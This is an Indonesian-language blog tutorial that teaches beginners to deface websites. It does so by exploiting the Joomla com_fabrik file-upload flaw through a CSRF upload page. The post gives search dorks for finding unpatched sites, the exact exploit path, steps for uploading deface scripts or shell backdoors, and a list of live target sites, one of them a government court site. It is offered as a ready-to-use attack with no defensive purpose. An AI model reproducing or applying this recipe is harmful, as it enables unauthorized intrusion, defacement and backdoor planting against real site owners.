Tutorial Deface Buat Pemula, Menggunakan CSRF buat Upload Script Deface/ Shell Backdoor

Hello Para Pecinta Deface :D


Kali ini gw akan share cara deface teknik com_fabrik dengan csrf, Apa itu CSRF? 
CSRF (Cross Site Request Forgery) Bisa Dibilang Teknin Hacking Untuk Mendapatkan Bahkan Bisa Juga menguasai Suatu akun dengan cara menyerang web yang dieksekusi atas wewenang korban tanpa dikehendakinya.
Poc deface yg satu ini lumayan lawas dikenal jg sihh, digoogle sudah banyak bertebaran artikel yg membahas cara deface yg satu ini tapi masih banyak menggunakan bahasa yg sulit di mengerti oleh para pemula, di sini gw akan tulis dengan bahasa dan kata yg mudah di mengerti oleh para pemula 
OK disini Bahan-bahannya Cukup Simple
- Drok
- EKSPLOIT
- CSRF
- SCRIPT DEFACE/ SHELL BACKDOOR 

Drok : inurl:index.php?option=com_fabrik
             inurl:index.php/component/fabrik/ site:.dk
             inurl:index.php?option=com_fabrik&view= site:
             inurl:importcsv.php site:
             inurl:viewTable?cid= site:com
(Jangan lupa kembangin lagi dorknya misal di kasih domain yg beda contoh site:.org (org bisa di ganti dengan nama domain tiap negara di dunia kan banyak,,,biar dapet yg Blum dipatch)

Eksploit : /index.php?option=com_fabrik&format=raw&task=plugin.plugin=Ajax&plugin=fileupload&method=ajax_upload

CSRF : Download Disini Klik

Script Deface : Bagi yg belum punya bisa Download disini Kumpulan Script Deface Keren 2018

Live target : 
http://www.pn-jeneponto.go.id
http://www.zambianacmisonline.org
https://www.tucss.org.sg
http://ticketexchange.co.il
http://copypaste.ph

TUTORIAL :
1. Dorking Gunakan Drok diatas.
2. Kalo sudah pilih target, dan masukan eksploit Diatas, Jika Vuln Maka ada tulisan seperti ini {"filepath":null,"uri":null}
3. Kalo sudah dapat yang vuln, tinggal kita copy target tersebut dan masukan kedalam csrf yg tadi kita download, klik csrf trus edit ganti http://site.com dengan target kita, Trus Simpan.
4. Setelah kita simpan, lalu kita buka lewat browser. Klik Csrf Klik Browser.

5. Klik Choose File, lalu pilih script deface kalian, kalau sukses maka akan muncul target kalian dengan script deface kalian. http://target.com/scriptdeface.html

6. Tinggal kalian copy, lalu paste dan jalankan dibrowser kalian. 
Gimana Mudah bukan, tinggal kita gunakan csrf untuk mengupload script deface :D
Ok sekian dari gw, semoga bermanfaat buat kalian semua aminn... :D

Comments

Post a Comment

Popular posts from this blog

Deface Bypass Admin Terbaru 2018

Deface Webdav With Apk Exploiter

Cara Menjalankan Sql injection Ditermux